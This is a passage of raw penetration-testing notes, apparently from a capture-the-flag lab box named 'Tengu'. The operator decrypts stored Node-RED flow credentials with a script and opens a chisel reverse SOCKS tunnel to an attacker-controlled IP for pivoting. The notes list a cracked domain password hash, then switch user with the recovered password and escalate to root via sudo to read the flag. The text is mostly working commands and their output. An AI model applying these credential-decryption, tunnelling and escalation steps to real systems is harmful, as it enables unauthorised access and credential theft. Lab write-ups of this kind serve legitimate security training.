└─# chmod +x node-cred-decrypt.sh
┌──(root㉿kali)-[/home/…/TENGU/results/10.10.174.151/exploit]
└─# ./node-cred-decrypt.sh ./JUNK/
{"d237b4c16a396b9e":{"username":"nodered_connector","password":"DreamPuppyOverall25"}}
https://blog.hugopoi.net/en/2021/12/28/how-to-decrypt-flows_cred-json-from-nodered-data/
https://dan-feliciano.com/2024/06/05/tengu/
nodered_connector:DreamPuppyOverall25
This credential can be used for the MSSQL service on the SQL target. #Requires pivoting, e.g. with Ligolo-NG or chisel, as usual.
./chisel server -p 53 --reverse
./chisel client --max-retry-count=1 10.8.0.71:53 R:1080:socks
t2_m.winters:af9cfa9b70e5e90984203087e5a5219945a599abf31dd4bb2a11dc20678ea147:Tengu123
#From mssql of SQL.
nodered_svc@nodered:/home/tengu.vl$ ls -lah
ls -lah
total 12K
drwxr-xr-x 3 root root 4,0K Mär 26 2024 .
drwxr-xr-x 5 root root 4,0K Mär 26 2024 ..
drwxr-xr-x 2 t2_m.winters@tengu.vl domain users@tengu.vl 4,0K Mär 26 2024 t2_m.winters
nodered_svc@nodered:/home/tengu.vl$ su - t2_m.winters@tengu.vl
su - t2_m.winters@tengu.vl
Password: Tengu123
t2_m.winters@tengu.vl@nodered:~$ whoami
whoami
t2_m.winters@tengu.vl
t2_m.winters@tengu.vl@nodered:~$ id
id
uid=1317801117(t2_m.winters@tengu.vl) gid=1317800513(domain users@tengu.vl) groups=1317800513(domain users@tengu.vl),1317801115(linux_server_admins@tengu.vl)
t2_m.winters@tengu.vl@nodered:~$ sudo -l
sudo -l
[sudo] password for t2_m.winters@tengu.vl: Tengu123
Matching Defaults entries for t2_m.winters@tengu.vl on nodered:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User t2_m.winters@tengu.vl may run the following commands on nodered:
(ALL : ALL) ALL
t2_m.winters@tengu.vl@nodered:~$ sudo su
sudo su
root@nodered:/home/tengu.vl/t2_m.winters# whoami
whoami
root
ROOT-SHELL !
root@nodered:~# whoami
whoami
root
root@nodered:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@nodered:~# pwd
pwd
/root
root@nodered:~# cat root.txt
cat root.txt
VL{REDACTED}
ROOT.TXT: VL{REDACTED}
